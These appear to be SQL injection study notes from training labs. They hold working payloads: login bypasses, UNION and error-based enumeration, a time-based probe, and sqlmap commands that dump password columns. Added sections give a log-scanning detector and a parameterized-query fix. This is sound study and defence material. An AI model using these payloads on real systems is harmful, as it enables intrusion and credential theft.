sqli
SQL injection is a security vulnerability that allows an attacker to interfere with the queries sent to a database. An attacker can exploit a poorly designed application and pass malicious SQL statements to the application's backend database. This typically gives the attacker access to data they otherwise wouldn't be able to retrieve, which could be all other database records accessible by the application.
Save the POST or GET request and run it through sqlmap to search for SQL injection.
THM: log in as bender by submitting this as the username: bender@juice-sh.op' --
Start with:
    '
    ' or 1=1; -- -
UNION-based injection is faster than boolean-based. Add columns until the count matches the original query:
    'UNION SELECT 'test1','test2'; -- -
sqlmap basic scan of one parameter:
    sqlmap -u 'http://testsite.example/search.php?search=n' -p search
UNION-based only:
    sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U
Saved request from Burp:
    sqlmap -r /root/blog.req -p user --technique=B --banner
Show the payloads used (verbosity 3, ignore cached results):
    sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U -v3 --fresh-queries
Dump two columns of a table:
    sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U -D blogdb -T users -C users,password --dump
Boolean-based on a login form (POST body; the --data value must be closed with a matching quote):
    sqlmap -u 'http://test.example/login.php' --data="user=a&password=a" -p user --technique=B --banner
Error-based injections
    1'
Reverse engineer the query by reading the error printed by the app:
    1');--
Remove the ' if the parameter is numeric:
    1);--
Inject arbitrary data so the database returns errors, e.g. by triggering a data type conversion error (MSSQL):
    1 or @@version=1);--
    1 or db_name(1)=1);--
    1 or db_name(2)=1);--
    wget "examplesite.com/products.php?id=1 or 1 IN (SELECT TOP 1 CAST(@@version as varchar(4096))))--" -q -O -
In-band SQL injections
    id=200' and 'a'='a
    id=200' UNION SELECT null,null, null; -- -
Microsoft SQL https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
SQLi: string concatenation
    -1 UNION SELECT username,passwd FROM users_private where username=concat(char(39),char(74),char(97),char(110),char(101),char(39))
// retrieve the passwd of user JAMES (74 65 77 69 83 in decimal ASCII, see asciitable.com) with UNION SELECT and concatenation
    -1 UNION SELECT username,passwd FROM users_private where username=concat(char(74),char(65),char(77),char(69),char(83))
CONCAT joins strings or characters, and CHAR() returns the character for a decimal ASCII code, so quotes and names can be built without typing a literal ' in the payload. ASCII table:
https://www.asciitable.com/
The CHAR() function returns the character based on the ASCII code:
https://www.w3schools.com/sql/trysqlserver.asp?filename=trysql_func_sqlserver_char
Get DB version and DB tables:
    ' UNION SELECT @@version,null,null#
The application contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:
    SELECT * FROM products WHERE category = 'Gifts' AND released = 1
    filter?category='+OR+1=1--
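The payload families above (tautologies like ' OR 1=1, UNION SELECT, information_schema enumeration, @@version / db_name() leaks, char()/concat() string building and trailing comment markers) leave recognisable traces in web server access logs. The following is an added example, not code from the original notes: a small Python scanner that parses constructed combined-format log lines, URL-decodes each query string and reports which indicator families matched. The log lines, hostnames and IPs are made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format, not from any real server).
# Lines 2-4 carry URL-encoded versions of payloads listed in the notes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?search=laptop HTTP/1.1" 200 5120
10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET /filter?category=%27+OR+1%3D1-- HTTP/1.1" 200 9811
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /filter?category=%27+UNION+SELECT+%40%40version%2Cnull%2Cnull%23 HTTP/1.1" 500 312
10.0.0.9 - - [10/Oct/2023:13:57:10 +0000] "GET /products.php?id=0+UNION+SELECT+1%2C2%2Cgroup_concat%28column_name%29+FROM+information_schema.columns HTTP/1.1" 200 4410
10.0.0.4 - - [10/Oct/2023:13:58:00 +0000] "GET /products.php?id=42 HTTP/1.1" 200 2210
"""

# Indicator patterns, one per payload family from the notes. They are deliberately
# narrow so the example stays readable; a production rule set would be broader.
INDICATORS = {
    "tautology":    re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum":  re.compile(r"\binformation_schema\b", re.I),
    "version_leak": re.compile(r"@@version|\bdb_name\s*\(", re.I),
    "char_concat":  re.compile(r"(?:\bchar|concat)\s*\(", re.I),
    "comment_tail": re.compile(r"(--|#|/\*)\s*$"),
}

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_query(path):
    """Return the URL-decoded query string of a request path ('' if there is none)."""
    if "?" not in path:
        return ""
    return unquote_plus(path.split("?", 1)[1])


def classify(query):
    """Return the sorted names of all indicator families that match the decoded query."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))


def scan_log(text):
    """Parse each log line and return a finding for every request with SQLi indicators."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = decode_query(m["path"])
        hits = classify(query)
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": m["status"],   # a 500 next to a UNION/@@version payload is worth a look
                "query": query,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["indicators"], repr(f["query"]))
```

Decoding before matching matters: `%27+OR+1%3D1` only becomes `' OR 1=1` after unquote_plus, so a rule applied to the raw request line would miss it. A 5xx status beside a version or UNION indicator (the third sample line) is the error-based pattern from the notes and deserves priority over a 200 with a tautology.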
-A "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/103.0"
wiener@exploit-0a2500eb03d06c6ac04c14a901c10018.web-security-academy.net
https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(2),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'anak%
SQL Workbench
' or username='rickie' --
' or username='admin' --
This payload works in the same way as the previous one; only the condition is changed so that the login succeeds as a specific user. It turns the login SQL into:
    SELECT * FROM users WHERE username='' or username='admin' --' and password='testing123'
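To show why the payload works and what removes the problem, here is an added example (not code from the original notes) in Python with an in-memory SQLite database: `build_login_query` reproduces the string-concatenated query above, `login_vulnerable` runs it, and `login_parameterized` runs the same check with bound parameters, where the input is only ever treated as data. The table, user names and passwords are constructed for the example.

```python
import sqlite3


def make_db():
    """Create an in-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret-admin"), ("rickie", "hunter2")],
    )
    conn.commit()
    return conn


def build_login_query(username, password):
    """The vulnerable pattern: user input is pasted straight into the SQL text."""
    return ("SELECT * FROM users WHERE username='" + username +
            "' and password='" + password + "'")


def login_vulnerable(conn, username, password):
    """Run the concatenated query; returns the matched username or None.

    With username = ' or username='admin' -- the trailing comment marker
    discards the password check entirely, so 'admin' is returned without
    knowing the password."""
    row = conn.execute(build_login_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same check with bound parameters: the quote and comment characters in
    the input are compared literally against the username column, so the
    injected condition never becomes SQL syntax."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? and password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or username='admin' --"
    print(build_login_query(payload, "testing123"))
    print("vulnerable    ->", login_vulnerable(db, payload, "testing123"))
    print("parameterized ->", login_parameterized(db, payload, "testing123"))
```

The same fix covers the ' or 1=1 -- form: with parameters the whole string is compared against the username column and no row matches. Prepared statements are the control here; filtering quotes or comment markers is not, as the CHAR()/CONCAT() payloads earlier in the notes show.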